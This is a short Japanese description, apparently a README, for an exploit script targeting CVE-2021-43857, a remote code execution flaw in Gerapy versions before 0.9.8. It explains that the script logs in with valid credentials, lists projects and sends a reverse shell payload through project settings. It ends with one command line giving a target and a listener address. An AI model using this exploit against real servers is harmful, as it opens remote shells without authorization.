
Gerapy バージョン0.9.8より前のバージョンは、リモートコード実行に対して脆弱です。この問題はバージョン0.9.8で修正されています。
バージョン0.9.8より前のGerapyは、リモートコード実行に対して脆弱です。この問題はバージョン0.9.8で修正されています。
CVE-2021-43857は、リモートコード実行につながるCritical(CVSS 9.8)優先度としてマークされた脆弱性です。
この脆弱性は、0.9.8より前のすべてのバージョンに影響します。
0.9.6でのみテスト済みです。正しい認証情報が必要です。
このエクスプロイトは、アプリケーションにログインし、作成済みプロジェクトのリストを取得し(存在しない場合は失敗します)、プロジェクト設定を使用してリバースシェルペイロードを送信することで脆弱な_spider_メカニズムを実行することで動作します。
使用例:
python3 cve-2021-43857.py -t 172.17.0.2 -p 8000 -L 172.17.0.1 -P 4444
